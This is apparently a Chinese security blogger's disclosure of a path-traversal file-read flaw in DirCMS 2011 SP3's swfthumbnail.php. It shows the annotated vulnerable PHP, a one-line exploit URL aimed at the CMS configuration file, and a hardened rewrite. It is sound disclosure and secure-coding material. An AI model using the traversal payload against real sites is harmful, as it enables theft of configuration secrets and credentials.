Time really does fly; a day spent at the computer is gone before you know it. That can't go on, so I plan to set aside some time to write blog posts and study, and to record my own progress.
Whether you are a programmer or a security engineer, reading other people's code is undoubtedly a fast way to improve, so starting today I will take the time to read and study the open-source CMS packages published on the webmaster sites.
I came across a copy of DirCMS and brought it back. The name is quite special (ps: be careful that dir doesn't overflow you).
It seems that the hackers' way of auditing code is to search for keywords and trace the key locations, keeping a list of risky functions and variable names. I am not a hacker, so I prefer to read the files one by one following the program's architecture and pick up the developers' techniques along the way.
When I saw the /api/upload/swfthumbnail.php file I was left speechless; it has only a few dozen lines of code.
As follows:
<?php
// This script accepts an ID and looks in the user's session for stored thumbnail name.
// It then streams the data to the browser from the file
// Work around the Flash Player Cookie Bug
if (isset($_POST["PHPSESSID"])) { // This check does not affect the rest of the program's execution.
    session_id($_POST["PHPSESSID"]);
}
session_start();

// The key spot. What does this regular expression actually accomplish? The boss should dock the programmer's pay.
// It only strips characters outside a-z, 0-9, ':', '.', '/' and '-', so '../' survives untouched.
$image_id = isset($_GET["id"]) ? preg_replace('/[^a-z0-9:\.\/\-]/i', '', $_GET["id"]) : false;

// Because of the regex problem above, $image_id is still truthy even when it is maliciously constructed.
if ($image_id == false)
{
    header("HTTP/1.1 500 Internal Server Error");
    echo "No ID";
    exit(0);
}

// This branch is only entered when the id does not start with http:// AND the file does not exist.
// Since the goal is to read local files, the id naturally does not start with http://, and the
// file can be made to "exist" with a relative path such as ../../
if (substr($image_id, 0, 7) != 'http://' && !file_exists("../upload/image/" . $image_id))
{
    header("HTTP/1.1 404 Not found");
    exit(0);
}

// Every check above has passed; the file is read and sent out as-is.
if (substr($image_id, 0, 7) != 'http://')
{
    header("Content-type: image/jpeg");
    header("Content-length: " . filesize("../upload/image/" . $image_id));
    flush();
    readfile("../upload/image/" . $image_id); // output the file
}
else
{
    header('Location: ' . $image_id);
}
exit(0);
?>
Tested version: the latest release, DirCMS 2011 SP3
Exp: view-source:/api/upload/swfthumbnail.php?id=.../../include/common.inc.php
The vendor has been notified. Do not perform illegal tests; the consequences are your own responsibility.
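For comparison, here is how the same thumbnail handler can be written so that the id can never leave the thumbnail directory. This is an added example, not DirCMS code: it assumes the same layout as the original (thumbnails under ../upload/image/ relative to the script), requires PHP 7 or later for the nullable return type, and drops the http:// redirect branch entirely, since reflecting a caller-supplied URL into a Location header is itself an open redirect. The pattern name THUMB_NAME_PATTERN and the function resolveThumbnailPath are my own.

```php
<?php
// Added example (not DirCMS code): a hardened replacement for the vulnerable
// filename handling in swfthumbnail.php. Assumes thumbnails live under
// ../upload/image/ relative to this script, as in the original.

// Accept only a bare file name: letters, digits, underscore, hyphen and a
// single image extension. No slashes, no "..", no colons, so the rejection
// happens up front instead of "cleaning" the input and hoping for the best.
const THUMB_NAME_PATTERN = '/^[A-Za-z0-9_-]{1,64}\.(jpe?g|png|gif)$/';

/**
 * Return the absolute path of the requested thumbnail, or null if the
 * request does not name a plain file directly inside $baseDir.
 */
function resolveThumbnailPath(string $id, string $baseDir): ?string
{
    if (!preg_match(THUMB_NAME_PATTERN, $id)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                         // thumbnail directory missing
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $id);
    // realpath() collapses any ../ segments and symlinks; after that the
    // file must still sit directly below the thumbnail directory and be a
    // regular file (not a directory or device).
    if ($full === false || !is_file($full) || dirname($full) !== $base) {
        return null;
    }
    return $full;
}

$baseDir = __DIR__ . '/../upload/image';
$id      = isset($_GET['id']) ? (string) $_GET['id'] : '';

$path = resolveThumbnailPath($id, $baseDir);
if ($path === null) {
    // One generic response for "bad name" and "no such file": do not let the
    // caller probe which paths exist.
    header('HTTP/1.1 404 Not Found');
    exit(0);
}

header('Content-Type: image/jpeg');
header('Content-Length: ' . filesize($path));
header('X-Content-Type-Options: nosniff');
readfile($path);
exit(0);
```

The two defences are independent: the whitelist regex rejects anything that is not a simple file name, and the realpath() prefix check catches whatever the regex might miss (for example a symlink inside the thumbnail directory pointing elsewhere). Keeping both means a future edit to the regex does not silently reopen the traversal.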
Author b4dboy